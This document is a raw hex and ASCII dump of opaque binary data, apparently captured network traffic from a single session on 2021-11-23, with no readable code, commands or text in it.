                                                                                    2021-11-23 13:42:55 UTC435INData Raw: 1c ec 2e 12 6d e4 71 d1 6e 3d 77 af 6d 6a 73 40 0a 61 3d 9a 81 f1 05 99 a9 d0 f4 c7 f2 fb d6 bf 68 ca 14 2e 53 71 3e bb 47 9a cc 7d c0 7a 77 e3 fc 08 e6 75 b8 94 60 89 b4 d5 f5 ca 32 8d a5 b3 0e 50 4d b4 cc 1b 73 0c a9 b4 3e 39 b8 c3 bb 21 52 42 b3 5b 80 c3 59 0c ad 19 8b 29 0c 6f 42 ff 2e 67 4f 76 95 7a fd b7 c2 89 93 7f e7 9c d0 64 57 c1 29 d5 a7 c2 04 36 f3 90 8f ea 11 d5 c7 18 06 b1 ef 7a 14 28 8d b8 51 bf 60 18 4f ef ff 95 9d 34 30 eb 7b 07 26 8d 75 bc aa 71 e3 84 03 d1 98 e3 6c 59 0c 2c 40 fd 15 b7 db 54 40 be ab 24 7b 6a 2a b7 51 bb 7c ea 02 2b 79 2c a0 ea 46 c7 c5 e6 91 e4 ff a0 3f ee 1f cf d7 01 07 e6 6b 95 9a 02 46 0a df 15 bf 38 68 ac 35 a6 b7 70 78 7a 7f 53 64 ac 88 e6 ce 1b a8 0d ea ea ba 47 e9 be af e1 fb 60 dc 9d 56 a1 f3 25 f6 47 81 cc dc
                                                                                    Data Ascii: .mqn=wmjs@a=h.Sq>G}zwu`2PMs>9!RB[Y)oB.gOvzdW)6z(Q`O40{&uqlY,@T@${j*Q|+y,F?kF8h5pxzSdG`V%G
                                                                                    2021-11-23 13:42:55 UTC439INData Raw: 6f 84 e1 0b 49 24 df bf 24 ac 30 bf 2b 10 2c 12 c2 b8 04 c6 27 8c 28 99 a4 38 7e d5 bc 67 a1 8d 00 83 dd 97 33 34 ef 6a e1 86 f4 b2 56 2e fb cd ca c6 94 d4 9c 38 9a 8c 51 9e e0 0d 23 52 e2 3c cd 11 fe d2 5b 5f d9 fa 8a e7 42 27 12 01 4f 52 47 42 ba f8 c2 b2 0a f5 64 a0 91 f9 97 1b 1a d7 f6 3b 3a 42 fa a8 b5 4a 7d 97 4c 57 54 1b 6e d2 85 08 08 0e 01 16 76 4d 3c 84 b4 8f e6 2a 1a 21 66 2f 11 e7 19 1f ad e5 e7 a2 5c a0 83 0d b5 d5 52 b7 97 1e f5 ee 40 9b 28 6b 72 d4 cd a9 9e f7 51 48 5e b7 23 23 59 48 91 8f b8 c4 e7 12 b2 5e 41 38 4c 90 6d 8c fe 90 fb 90 8e cc e2 31 49 ea f0 39 0d 6c c5 95 2c 3b 99 45 1b c2 19 08 50 7c 86 10 39 3b 22 46 10 40 bc 10 21 5a b7 97 18 04 f4 0a 65 34 9c 90 f7 19 ad cd 91 41 c7 f8 db e3 92 fa c0 3f da 54 50 32 d4 d6 9a cc 77 e6 68
                                                                                    Data Ascii: oI$$0+,'(8~g34jV.8Q#R<[_B'ORGBd;:BJ}LWTnvM<*!f/\R@(krQH^##YH^A8Lm1I9l,;EP|9;"F@!Ze4A?TP2wh
                                                                                    2021-11-23 13:42:55 UTC442INData Raw: d1 fe 33 32 b1 98 5e c6 33 63 78 65 21 b8 fa c2 ac a3 ff 7d 0e 2c 38 e1 c7 74 2c d4 f3 f9 28 84 d3 39 3c 4e 7e 78 21 b1 f7 ad 84 98 69 99 f2 12 bb b8 65 3e 4e 12 f5 54 e4 1a 45 84 e4 4e 34 b8 b4 80 ca 1d 05 68 24 fb f7 53 06 96 2f 8d 74 08 96 54 f3 59 40 82 19 8e 0a a1 7c 51 b0 59 67 a9 0e 03 4a b7 3b d7 57 30 ce 9d e8 b8 8e 07 a3 4a 75 3e 15 b7 12 df 5b 77 65 4a ec ca c6 50 d9 02 18 f2 04 39 07 f7 29 80 95 f9 33 7d d9 0a f3 b1 8c ff f5 96 05 10 49 4f cf af e2 71 ee b1 7e f1 f9 0c 0b fa 05 19 cc f5 dc b2 cf a0 c5 7a 82 82 d6 7e f2 22 e3 67 cd 38 4a 25 23 8c 28 4a 48 ce e9 5f 52 a9 15 9e a3 fa d9 26 81 c2 69 44 7d e6 69 43 91 f0 0f 72 dd ff 6f 10 85 cf bf 03 16 04 ea bc c5 0e d5 27 87 59 91 ab 26 56 20 94 e5 a7 a5 ae 9a f5 7a 2e 19 ee 61 e6 84 4b b6 76 34
                                                                                    Data Ascii: 32^3cxe!},8t,(9<N~x!ie>NTEN4h$S/tTY@|QYgJ;W0Ju>[weJP9)3}IOq~z~"g8J%#(JH_R&iD}iCro'Y&V z.aKv4
                                                                                    2021-11-23 13:42:55 UTC444INData Raw: 9b e9 0f 74 b9 c7 d2 59 50 6a 47 71 a6 e2 87 03 85 2f 8d 02 d9 62 69 15 27 6f 20 89 97 6f e9 b2 86 ae e8 60 f5 9e fc b7 51 ea 20 df 8b 3f 26 5b 17 87 a2 f3 31 a7 b1 18 07 b5 e6 02 94 04 86 98 53 fa 0b 18 4f fe e5 b6 b6 53 16 c0 88 47 26 8d 67 f2 db 71 d3 80 2e d0 b2 cb 6d 58 0e 3a 5c fd 1c 87 8b 4c 57 a0 82 13 5b 3f a8 91 7a 4b 49 f5 0a 3e 4e 16 4c 91 5f c1 dd cf 98 d4 e0 9b 1b f9 5b a5 dd 2a e9 c7 66 4a 56 a1 49 2e c2 0d 4a 38 58 aa 32 2a fb 70 78 7b 55 18 7a 81 88 b3 c1 02 a8 07 ce 8d 98 bc f4 b0 7b 15 d1 64 e2 3c 7b b3 d3 76 ed 46 81 c2 01 6e 1e 3d 00 b0 d4 2e 29 c7 fb ac 55 9f 0d c8 a2 b6 d6 91 db 00 d8 91 0a 78 45 ae 02 70 0a dc a2 16 74 ab 35 34 7a b2 a6 8b 48 11 60 72 bb 00 9d 2f 00 a7 fd b7 94 62 79 d5 83 4d 43 f5 53 f0 c8 eb 22 dc d4 0e 31 55 01
                                                                                    Data Ascii: tYPjGq/bi'o o`Q ?&[1SOSG&gq.mX:\LW[?zKI>NL_[*fJVI.J8X2*px{Uz{d<{vFn=.)UxEpt54zH`r/byMCS"1U
                                                                                    2021-11-23 13:42:55 UTC445INData Raw: 69 44 6f c4 23 1e 14 dc b5 16 80 28 99 04 30 56 26 6c db 2c 39 23 ac 4c 91 c0 26 56 2c 94 06 a7 a5 a2 5d de 96 05 ff ce 4c e6 be 5a b2 56 24 d6 cb 8b af 9e db 29 12 9c a5 e5 ae e4 07 af 7f f1 1a 8c 39 d5 c2 25 4b c0 d7 8c bf 65 34 1b 13 4b 35 81 6c b1 d9 31 93 30 21 73 d7 ff f1 0d 37 5c b8 18 31 29 4c a8 92 9e 49 73 ad a5 28 62 64 6e d3 f0 2f 1c 0f 00 73 f2 69 19 a6 e9 87 f1 78 1e 04 6f 01 07 ce 86 8d 4f 2b bc 04 5c a0 8f 28 7f f9 52 b1 bb 10 45 ee 4a 4f 38 6a 72 1b f7 7c b6 46 5b 36 65 a4 26 59 6a 60 76 8b aa cb e2 aa cc 6f 4b 57 28 b8 67 87 d3 97 2c a6 ae cc 1c 31 49 ea 85 4e 15 4a c7 a7 37 36 fa 5b 33 37 34 c6 88 5a 20 1a c7 2b 1c 27 10 5b d9 ad 22 56 96 ad 3b 4f 41 16 65 3e 8f 9b dc 0f 8b f2 b9 d0 81 f8 d1 f1 94 84 b4 3f c4 26 41 10 fd 60 9a cd 66 f0
                                                                                    Data Ascii: iDo#(0V&l,9#L&V,]LZV$)9%Ke4K5l10!s7\1)LIs(bdn/sixoO+\(REJO8jr|F[6e&Yj`voKW(g,1INJ76[374Z +'["V;OAe>?&A`f
                                                                                    2021-11-23 13:42:55 UTC446INData Raw: 5f fa 29 0c 55 fd b7 93 49 28 dc 83 50 9d f6 58 db 2e c1 33 d2 0a 1e 31 5f 29 e1 cd 93 40 ab e5 6d 1d 86 f0 a2 fd f5 25 3e 6d 4a 88 52 ea e7 33 07 67 a8 5d 22 f2 f4 e0 71 32 35 7b 2b b4 b9 15 24 a4 59 b3 c4 5d 6b e7 86 e9 87 31 33 32 b3 aa c6 cb 15 1b 15 7e 0c 91 e5 7f b4 8e d0 70 73 6c 13 10 eb 21 37 d5 f5 de 01 9a fa dc 3a 66 ea 50 1b b6 df 9e ea 7e 6f b1 66 08 96 af 3d 21 91 12 f1 72 f7 28 63 e3 af 4e 3e 91 a0 66 49 5a 2e 85 27 f0 ef 58 74 88 07 74 62 76 da 7c 2c 5d 2f 93 77 66 00 b6 2f 40 97 67 62 f7 22 25 9a ad 1b 08 47 17 c8 e3 8a 35 8e 03 a3 09 66 14 16 b1 11 6a 73 a8 6f 62 53 e2 45 56 df 13 68 cf 03 31 30 17 73 87 92 d1 be 5d 0a 23 ff 85 a4 00 f4 97 13 16 26 a5 cf bb e8 f1 31 ce 79 f1 fd 2c c2 c2 e5 03 e4 a9 dc b2 c9 c3 2c 7a 93 f6 95 5e e2 01 fa
                                                                                    Data Ascii: _)UI(PX.31_)@m%>mJR3g]"q25{+$Y]k132~psl!7:fP~of=!r(cN>fIZ.'Xttbv|,]/wf/@gb"%G5fjsobSEVh10s]#&1y,,z^
                                                                                    2021-11-23 13:42:55 UTC447INData Raw: 88 b0 df 05 94 35 92 b7 c1 83 c4 f0 94 80 ee 50 56 51 41 32 b9 0f 17 cd 7d c6 15 46 e3 fe 17 23 72 97 9a 57 90 b4 df ef ca 2a 80 a0 ee 30 a4 67 b2 d1 21 bc 27 5f d1 0f c6 b8 c7 d2 63 e1 42 b9 77 8e 89 ab 0c a4 f7 82 22 16 8f 50 fd 06 05 4f 76 9d 42 79 44 c6 bd ea 98 f1 92 d4 49 4a 85 49 f3 8c 3c f2 23 c0 2f a2 f9 31 84 de 18 07 a9 ec 6d 01 05 b1 9e 4c 80 0b 32 09 e5 d5 b2 b4 df 1c c0 f3 82 26 83 76 8c a0 71 d0 b4 09 d1 8c e3 6c 59 0e 30 5e d0 1c 89 be 60 4c 98 d1 76 7d 41 23 b9 ce 4f 56 ee 32 18 7f cc 95 a1 5a c7 4d e2 92 f2 a8 8d 35 d9 73 9a a6 01 0d cc 5a a3 5b 78 4b d6 ff 24 b5 32 46 81 6f 80 a5 70 5b 7a 7d 44 7a 81 82 d4 f5 2a 8c 0c ee cd a9 41 a3 be a4 8f f6 b2 d4 a0 84 b3 d5 58 c7 f2 81 c8 d9 34 42 15 4c b4 fc 01 33 ea e9 aa e5 98 97 f2 5a 57 fe 6e
                                                                                    Data Ascii: 5PVQA2}F#rW*0g!'_cBw"POvByDIJI<#/1mL2&vqlY0^`Lv}A#OV2ZM5sZ[xK$2Fop[z}Dz*AX4BL3ZWn
                                                                                    2021-11-23 13:42:55 UTC449INData Raw: 39 d6 ce 7e f0 e6 1c c6 d9 7f 07 e4 0a 88 b2 c9 99 2e 15 0b 89 df 58 99 08 e3 67 e1 a8 67 26 03 81 00 10 1d b1 ef 72 44 b8 7e 3f 7d fa df 57 8b db 41 a7 55 57 63 6f 82 3f 55 54 16 b3 36 0f ad 36 c4 0f 10 2c 07 d3 f1 04 c6 25 72 01 9c 5c 6a 56 2a b6 7c 8a 81 8e a3 f1 ba fe 07 cc b3 e7 ae 5c b0 39 ad d7 cb e7 be 92 ff 6f 16 b4 f8 fe 9e ea 19 19 76 d7 1c e7 28 fe d5 50 72 1b db ad 34 4d 3c 33 a3 5c 5a 6a 47 b9 d5 2e b6 09 b4 75 a9 86 d9 6c 33 48 dd 28 31 57 05 84 82 b1 25 f7 87 48 28 30 0d 10 ea f4 40 0c 0c 6f f0 2d 4d 3a f5 a9 87 f1 76 66 07 76 27 0a c8 bd a0 b7 34 84 fb 5c a0 89 14 cb d1 6e b7 d8 37 45 ee 41 92 0b 6b 59 cc df a3 b6 46 51 48 54 a7 3f 48 5e 6e b7 ab 6c e9 1f be 9a a1 4b 57 2a 92 70 9c fe 84 d4 ed 02 e5 50 37 32 ec 9f 63 09 44 93 87 26 19 02
                                                                                    Data Ascii: 9~.Xgg&rD~?}WAUWco?UT66,%r\jV*|\9ov(Pr4M<3\ZjG.ul3H(1W%H(0@o-M:vfv'4\n7EAkYFQHT?H^nlKW*pP72cD&
                                                                                    2021-11-23 13:42:55 UTC450INData Raw: d5 53 d4 47 ab 8e df 4a 3a 17 4c b0 d4 54 42 ea ed 8a 5d bf 47 ec 72 2c fe 7d 4c 00 d2 ff be 78 44 a8 2a d4 0a d4 65 c8 7b e1 1e d2 51 b3 b6 6c 48 1c 94 7a b5 19 fa 2f 25 fa cd b3 95 7c 48 dc 83 03 43 f5 42 e6 d4 c6 0e d2 2b 70 19 8f 37 c9 32 93 69 84 cd fc 5b 86 f6 d0 be c5 21 34 d3 67 93 74 de db 33 16 1d 8d 06 22 f6 e4 d4 55 04 14 45 b1 b2 92 75 8f 93 52 98 35 56 10 ca 7d 14 bc c9 18 df a4 85 62 cd 9a 0e 03 65 3a cd d0 69 ac b8 ec 52 0a 34 17 38 7b 4e 2d de 9a 8f 29 ae f1 db 2e 4a 5c c5 1b b0 fd 83 b9 7e 69 93 97 53 96 a9 49 36 e3 32 25 40 ca fc 6d 63 e2 5c 3a bd 1f ab c9 1c 3c 81 0b 4e 24 70 dc a0 55 72 74 02 b8 d1 2c 59 4a a0 c3 66 0a a7 67 4a 8a 14 52 d1 60 05 5b b4 bd 40 75 8b c9 f2 a5 35 8e 0d 8d 4c 7b 15 10 b1 47 4b 73 a8 61 6a 6c c3 95 4e f1 fb
                                                                                    Data Ascii: SGJ:LTB]Gr,}LxD*e{QlHz/%|HCB+p72i[!4gt3"UEuR5V}be:iR48{N-).J\~iSI62%@mc\:<N$pUrt,YJfgJR`[@u5L{GKsajlN
                                                                                    2021-11-23 13:42:55 UTC451INData Raw: 93 40 7c fa 9c 46 62 d3 9d e1 b2 8d e4 0b 31 49 e0 ff 63 0d 7d cd 91 bc 6a 62 45 1b c9 45 8e 8e 72 95 00 ea 6c 12 44 07 c1 a7 d8 21 5a bc 5d 3d 52 66 08 7d a4 f6 d6 dc 0f be b7 f4 f4 c7 f9 cb dd bf a2 ee 26 40 29 0c 34 bb 61 eb 81 7d c0 7b 7c e1 e4 8b 89 f3 b2 b2 1a 9a a5 d1 f9 ee 33 a0 8e 4a 25 a4 61 9c c5 05 75 bc 83 e4 e2 34 93 14 d4 58 62 46 b9 31 a6 e8 ab 6d ae 29 90 2b 2b f5 3b b7 2e 67 4e 07 df 6f e3 9b dd 82 cf 40 e5 8b 4e 3d fa ea 2a f2 92 1b 30 12 ea 9f 38 80 7a ae de 19 77 f8 ec 6d 00 12 ab 8e 73 d8 0c 1e 67 05 d5 b3 b0 f5 1a eb 5f 0c 0d 6d 7c a7 4e 62 e3 81 03 9b 98 e3 6c 3b 0e 30 4f d2 09 0b d9 05 40 be ae 78 35 41 29 90 6f 62 67 ce 1a 29 ce 4a 2d 91 5f c6 df cf ba d4 e5 95 af b1 3d a3 d7 00 7c 81 4d be 77 38 40 e4 fa 27 ac a2 2c a6 35 a6 ac
                                                                                    Data Ascii: @|Fb1Ic}jbEErlD!Z]=Rf}&@)4a}{|3J%au4XbF1m)++;.gNo@N=*08zwmsg_m|Nbl;0O@x5A)obg)J-_=|Mw8@',5
                                                                                    2021-11-23 13:42:55 UTC452INData Raw: 47 1d 12 8c ca 1f 8e 07 a4 27 4e 15 16 bb 39 36 73 d9 65 4a e6 ed 45 50 d9 84 30 c5 05 36 01 ce ad f2 95 f9 35 5f 0a 29 23 93 a4 00 f5 e8 02 16 26 1d ce af e8 74 90 ce 7e f1 fd 2c c2 f7 fd e1 e4 0a da 9f cb 9e 06 6d a8 9b ef 5d e2 68 e3 67 e5 dc 4a 25 34 d9 4d 1b 36 bb fe 72 47 9c 17 af 13 b5 d8 2c 8d ce 6c aa 5b e1 4f 7f af e7 01 79 f9 d7 94 fb aa 5f ef 02 10 26 28 bd d1 19 eb 25 8a 42 95 79 0d 55 26 97 9f af ca f9 82 dd 97 05 18 f0 41 ee 7e d5 b2 56 25 fe 8d e1 c5 94 cc 6d 04 b6 ad d3 9c f6 2d 3d 10 b1 1b ca 33 05 ca 5b 59 c3 ff c0 c1 4a 3e 74 57 5d 5a 66 42 b3 c5 03 a9 0b 07 75 a9 83 c1 07 33 47 d7 f6 31 29 46 84 82 b7 5d 6c ab 4f 08 73 49 6f d3 fe 6a 2e 25 f7 79 2f 7d 36 8e aa 87 f1 72 09 29 77 27 02 f3 8b 85 98 13 bc ba 5c a0 83 2a ed d2 a5 b7 90 41
                                                                                    Data Ascii: G'N96seJEP065_)#&t~,m]hgJ%4M6rG,l[Oy_&(%ByU&A~V%m-=3[YJ>tW]ZfBu3G1)F]lOsIoj.%y/}6r)w'\*A
                                                                                    2021-11-23 13:42:55 UTC454INData Raw: d4 38 ca 06 ae 15 c5 b1 64 6b a9 2b db e8 22 7b de ef 04 3d 8d 3e c9 53 c0 d2 15 1e 1c 18 21 1c 1f 80 bb e3 02 a8 09 f0 ea 82 4a e8 e3 d3 15 d1 66 d6 a5 4c 95 f5 1b 69 8f e0 ae ba 2c 5d 70 29 d6 b1 42 54 8f fb a7 7b 99 67 0c ba b8 c7 08 be 66 b8 dc db 1e 23 cd 4c 74 1c f0 bd ee 61 b4 1b f9 1e b9 8e fa b7 ee 9f 71 90 9f f6 04 e3 ec d6 6f 86 65 62 34 8b 5d 59 97 54 eb ab 8a 25 ac 1a 0a 37 4e 2d fe c6 f0 70 dd 71 11 3a df fc b2 e2 cc 78 2d c0 4d 80 48 c2 ef 28 75 78 ea 05 33 f2 e4 dd 7c 0d 6d c7 fa d5 e0 14 1e a2 45 c0 22 78 cf c4 49 d7 9c 71 25 21 b3 a9 78 cd 04 1b 15 fb 30 ba d4 31 bf a5 ee 50 17 15 e3 18 85 51 0d b6 e6 d3 38 a9 fc b2 5c 5d 73 41 1c 9a f7 b8 db 79 69 8b f9 08 96 c2 43 16 80 3a ca 5f e2 09 bd 42 e4 4e 3c bd cd ab c9 1c 41 c5 22 db 2e 5e d7
                                                                                    Data Ascii: 8dk+"{=>S!JfLi,]p)BT{gf#Ltaqoeb4]YT%7N-pq:x-MH(ux3|mE"xIq%!x01PQ8\]sAyiC:_BN<A".^
                                                                                    2021-11-23 13:42:55 UTC455INData Raw: b4 82 e6 2b 1a 2c 66 21 11 eb f8 e7 9e 35 9e e8 5b b1 8e 2c e0 d2 72 bb b8 ed 48 c5 e2 11 66 61 59 f9 f4 09 a5 42 7a fd 47 a1 0d eb 60 4e ba 35 2a 9c cf a0 b6 75 82 46 2b ff 3d 87 d3 97 d9 83 9f f7 58 4f 14 e0 9f 67 1c 69 ef 07 26 13 2a 1d 7a 48 69 c6 8e 76 85 12 eb 24 25 4e 7f 0a d2 73 2b 71 bc 5f 02 62 51 0d 48 2e f1 c6 dc 0f bb e6 0a ac c4 f8 b0 70 c9 84 ec 3b cb 59 91 bb bb 60 9b e4 3b c0 7a 7d 1d ff 02 f7 26 ef b2 1b 94 94 75 f1 e7 34 c7 26 c8 25 a4 63 a7 dc 2c 45 11 86 db d9 38 ab cd c5 41 7e 52 c7 2c a6 e8 af 2c 3d 71 82 29 5c ef 1f ff 2e 63 5e 7c 86 69 f7 64 c9 b9 16 67 d4 91 aa 14 51 ea 2e ec ac 57 ae 69 e8 87 a6 87 6a ae de 1c 26 d3 f5 6d 01 14 83 89 0d b0 6a 98 12 e5 d5 b7 a7 db 65 c0 89 07 20 0d 2c 8c a0 75 ad de 03 d1 9c 8c 6e 58 0e 36 7e a9
                                                                                    Data Ascii: +,f!5[,rHfaYBzG`N5*uF+=XOgi&*zHiv$%Ns+q_bQH.p;Y`;z}&u4&%c,E8A~R,,=q)\.c^|idgQ.Wij&mje ,unX6~
                                                                                    2021-11-23 13:42:55 UTC456INData Raw: a9 43 12 97 01 d5 80 ea 12 4c 4b 6e 4e 3e 9f 57 ba e9 3c 2e 85 62 ef 24 70 d6 88 07 72 96 09 90 7c 26 59 40 88 9a 67 0a a1 66 4c 9d 4c 33 d7 71 02 48 b3 33 f7 52 17 ce 9d 62 30 8e 07 12 63 7a 15 1e bb 39 36 73 a8 65 4a e5 d2 4c 50 f1 04 30 c5 05 39 01 ce af a8 d4 f9 34 57 08 2a 3e 82 ab 26 d3 94 19 9b 04 a7 cf ae ff 51 9a e8 58 db 80 4e c2 d9 d1 2c 08 77 bf b2 c9 8c 07 8b 81 b8 d5 5e ed 05 e3 67 e5 b5 4a 25 27 b4 1d 37 31 97 92 3d 56 ba 15 9c 5a d1 2e 2c 84 eb 4b a3 49 e6 63 6f 84 e1 0b 52 16 ca a7 23 8b 16 a7 2b 15 2d 03 ba c7 18 dd 0e b1 6c c2 17 26 56 2e aa f6 a5 bd b3 ae ce bb 55 7a e4 4c e3 b9 cb ac 34 44 be e1 c7 ee 46 d9 44 f3 ba 8f 15 9d d0 0d 34 34 f1 1a ca 39 d5 d3 5b 5b dc c1 aa fc 6c 2e 33 12 5d 5a 6a 6e aa c9 04 8a 07 7c 16 a9 80 f5 1b a2 4a
                                                                                    Data Ascii: CLKnN>W<.b$pr|&Y@gfLL3qH3Rb0cz96seJLP094W*>&QXN,w^gJ%'71=VZ.,KIcoR#+-l&V.UzL4DFD449[[l.3]Zjn|J
                                                                                    2021-11-23 13:42:55 UTC458INData Raw: d5 b3 b6 f4 2b e8 87 06 26 8b 5d ba af 71 a8 01 03 d1 9c cb 7d 58 0e 36 75 f8 10 91 db c9 40 be ab 06 7d 3a ac 91 7a 4b 7e f8 19 3e 52 15 95 b9 4d c6 c5 e4 b9 fe e8 8d 4e 4d 70 a3 d3 29 1e cd 4d b8 5c 24 6d e0 cb 0d 1c 38 58 aa 1f bd 87 74 78 1d 7d 44 7a f4 82 c0 a4 00 80 22 ef c7 ba 7a c6 9e a2 13 fd 5c e1 8b 71 98 2d 58 94 52 81 c8 db 5e 38 7a 79 b0 d4 22 ec af c6 a2 11 bf 47 e6 64 84 e0 48 dd 7b cb b9 be 7c 42 88 24 3b da c2 80 37 77 a7 18 fa e3 b3 b6 8d 60 70 60 7a b1 81 e4 24 0f 01 dd 95 bf b1 57 f4 7c 5a 43 f3 51 7c 80 eb 22 f5 23 52 31 5f 23 92 b9 93 69 88 9f 63 5b 87 e0 a3 e6 c5 21 2c c4 45 a9 52 8a a1 33 16 18 f1 6d 27 f6 0a cc 78 14 44 53 a2 a5 bb 09 95 d3 f9 98 31 7c c6 ec 64 d1 ad d9 a9 4b fd 82 73 ca 64 55 03 65 20 aa ef 4d 8a a1 e7 cc 74 6e
                                                                                    Data Ascii: +&]q}X6u@}:zK~>RMNMp)M\$m8Xtx}Dz"z\q-XR^8zy"GdH{|B$;7w`p`z$W|ZCQ|"#R1_#ic[!,ER3m'xDS1|dKsdUe Mtn
                                                                                    2021-11-23 13:42:55 UTC459INData Raw: 71 3e d7 86 c7 e8 32 04 04 7c 2d 46 bc af fb d6 be 21 01 d7 af 9f e5 2d 52 62 07 e8 19 d6 46 84 84 17 4c 66 93 68 45 36 cb 70 fb 0b 40 08 08 a2 7f 33 5b 1c 9b 8f 57 ef 5a f6 29 77 21 a2 e8 17 c5 9f 35 90 d1 56 98 7a fd 34 06 d2 dc 93 71 41 d6 7f 6f c4 9e 53 c5 99 5d 49 b9 d1 24 54 a4 22 65 e1 b6 6e 74 a0 f9 55 5e 4d a1 4b 57 3f a0 68 86 6a 9d f2 82 f2 e4 50 20 4b c8 85 62 0d 6a bc e6 27 13 20 5f 36 f8 12 d7 8a 0c ff 1a c7 29 ba f1 7f 39 d2 73 2b 47 90 69 37 15 2b 0a 65 3a 9e 9e 46 12 92 dc 9f 8a ab f8 d1 f4 85 81 76 34 a4 2f 41 34 b1 6c b1 c7 6e c4 51 ba f0 fb 3a 26 55 99 56 65 fd b4 d5 f5 f6 30 d8 cb 95 25 a0 e9 01 b9 63 5f 00 85 55 2b 31 b0 a8 b7 4a 52 48 ae 28 c9 8c aa 0c a4 20 97 46 59 6e 42 f5 00 65 64 74 bc bf f1 9c 36 ba c1 66 e7 9e c6 4f 71 67 02
                                                                                    Data Ascii: q>2|-F!-RbFLfhE6p@3[WZ)w!5Vz4qAoS]I$T"entU^MKW?hjP Kbj' _6)9s+Gi7+e:Fv4/A4lnQ:&UVe0%c_U+1JRH( FYnBedt6fOqg
                                                                                    2021-11-23 13:42:55 UTC460INData Raw: 03 05 06 03 bb c5 04 c6 23 b7 7a bc 74 a2 56 2a bc 43 a7 a5 b9 81 a6 f3 2e 19 e0 55 ca a7 7c bb 7e ad d6 cb eb ee 9d f2 44 e7 ef 35 fe 9e ea 1c 19 6d d7 18 b1 57 d5 d3 5f 36 53 d7 86 cb 56 19 1d 31 77 60 60 47 5d d8 02 46 29 15 73 bb 81 d9 9e 33 48 dd e5 35 3b 42 ac 16 b5 4a 73 94 49 06 8f 1b 6e d9 e7 45 1a 0b 28 ec 2c 4d 36 a6 f7 87 f1 78 21 bf 77 27 0a ff 91 c7 08 35 94 f1 4e a1 a1 98 cb f9 58 9a 50 79 2a 77 40 91 31 6b 87 fa d6 8b 3c 46 51 42 88 a2 0c 5c 63 48 91 89 aa d4 cf c6 c9 5e 4c 57 2c 90 6d 85 e3 97 f2 8d 8b e4 50 31 49 e0 9f 61 11 71 e2 80 00 3b 4c 44 1b c2 1e e0 a5 85 94 19 f7 24 34 53 10 5b d3 73 21 5a bd 49 39 2a 40 0a 6f 3c 8c 8e f1 0c 99 e0 93 89 a8 f8 d1 f4 bf 7c ec 3f da 43 71 32 bb 06 9a cc 7d d3 7a 77 f2 fd 3c d8 5a c9 dd 1b 90 b0 f5
                                                                                    Data Ascii: #ztV*C.U|~D5mW_6SV1w``G]F)s3H5;BJsInE(,M6x!w'5NXPy*w@1k<FQB\cH^LW,mP1Iaq;LD$4S[s!ZI9*@o<|?Cq2}zw<Z
                                                                                    2021-11-23 13:42:55 UTC461INData Raw: 43 f5 40 fc e3 18 31 f1 20 fd 3f 5b 38 e4 57 fc 1c 83 e5 43 4e ab fc 85 f7 c1 4e 48 c5 4a 82 7e b7 cc 37 05 1d c9 ac 33 f2 ca bb 79 14 38 46 8f b7 9f 34 0b b4 56 b3 31 03 a8 c1 56 f3 be ca 5c 4a b4 82 79 d7 38 71 25 1b 52 bc c3 6d a5 cc 8c 57 0d 2c 1a 55 f9 4e 2d d4 ff d4 29 ae d3 dc 3c 4e 32 50 1b b0 82 ab eb 7e fa 99 f8 08 27 a9 43 16 5e 12 f5 5e 0f 03 6d 63 ef 4f 3e 95 a2 aa c9 16 69 84 23 db 41 71 d6 88 84 73 74 08 0c 7d 2c 59 fa 89 76 66 d2 a0 76 4c 6b 4d 41 d7 52 01 4a b3 b7 f5 47 17 65 9f c0 35 6e 05 a5 66 4d 16 16 bb 12 35 7e 83 f7 72 a0 e1 45 50 a7 77 30 c5 01 37 05 df a8 1a ec d9 34 5d 0b 58 03 af a4 01 9a e4 02 16 2c 9f e7 ac e8 7c ee bd 7e f1 f9 22 c6 c8 d0 9d 9d 28 dc b2 c8 f9 0e 7a 82 89 b0 2d e3 05 e9 5f ef b6 4a 25 5b d9 03 1a 32 bf ed 4e
                                                                                    Data Ascii: C@1 ?[8WCNNHJ~73y8F4V1V\Jy8q%RmW,UN-)<N2P~'C^^mcO>i#Aqst},YvfvLkMARJGe5nfM5~rEPw074]X,|~"(z-_J%[2N
                                                                                    2021-11-23 13:42:55 UTC462INData Raw: 84 ec 3b d8 46 43 ba 0c 0f 40 cc 7d ca 64 5a c9 d8 13 8e 9f b2 b2 11 8d 99 f3 d7 99 46 a6 a6 91 56 6c 67 b6 dc 1b 73 1f a9 b1 56 39 b8 c3 bb c4 53 42 b3 48 22 e8 ab 0c 85 3d 7f 22 3d 6f 69 2e ae 15 4f 76 93 44 37 1a b9 af e8 62 cc 47 aa 38 51 ea 2e 9c 45 36 2e 3e ff aa ed df 49 dc de 18 02 a3 fa 1e 8c 04 86 94 4f fd 48 3e 5e e0 c2 ea a1 87 9b e2 88 07 27 96 5b b4 86 60 d7 8d 15 d8 16 54 03 c9 0f 30 54 f6 0e 95 cf 34 40 be a5 00 0e 86 29 91 70 54 7b f5 3e 40 26 3e 86 95 2c 0f c5 e2 98 72 96 8d 35 cc 5b b1 c4 04 26 62 5e ba 5d 9e 60 d5 1a a5 c7 38 58 a8 1e 7b a5 72 86 6f 4e 44 7a 83 90 c2 cb 73 a8 0d ea a8 2d 6d ea 92 f9 97 d1 62 ce 9a 79 cd a4 5e ef 43 ee 59 de 4a 31 68 cf b0 d4 20 4c 9b e3 8a 59 d0 c8 ed 72 a2 c7 e0 d8 00 de ab bc 04 c1 a8 2a 15 74 ad a8
                                                                                    Data Ascii: ;FC@}dZFVlgsV9SBH"="=oi.OvD7bG8Q.E6.>IOH>^'[`T0T4@)pT{>@&>,r5[&b^]`8X{roNDzs-mby^CYJ1h LYr*t
                                                                                    2021-11-23 13:42:55 UTC463INData Raw: dc b2 cd f6 31 7a 82 8c f7 00 e3 05 e5 71 c9 a5 6c 2c 08 b5 28 17 3d 9a 34 22 43 ba 11 b2 57 27 d4 07 69 fb 7c 88 ad f8 4b 90 84 e1 0d 21 60 dc bf 04 d7 43 e7 03 10 26 14 91 d8 22 cf 4c 0a 4b b9 7e 30 cc 33 91 73 81 a3 c7 24 dc 9d 24 0a ed 5a f4 a6 62 6c 56 24 d6 c7 ca 24 94 d4 85 03 95 b5 f6 04 f3 02 e4 6c f1 1a cb 11 93 d3 5b 53 d0 d2 e9 69 4b 34 11 78 f5 5b 6c 66 9d c2 21 b9 52 23 75 a9 86 9e 56 33 48 dd ce 93 29 46 84 52 a0 4a 79 87 60 68 1c 1b 64 c2 f1 2f a0 0f 00 73 43 e4 3d 8e af ab e0 7a 0e 5a 4f 27 00 e8 f8 f3 9f 35 9e c3 25 a0 89 00 1b ef 52 b7 92 59 03 ee 40 9b 2a 64 36 55 de a3 bc 29 f8 49 54 ae 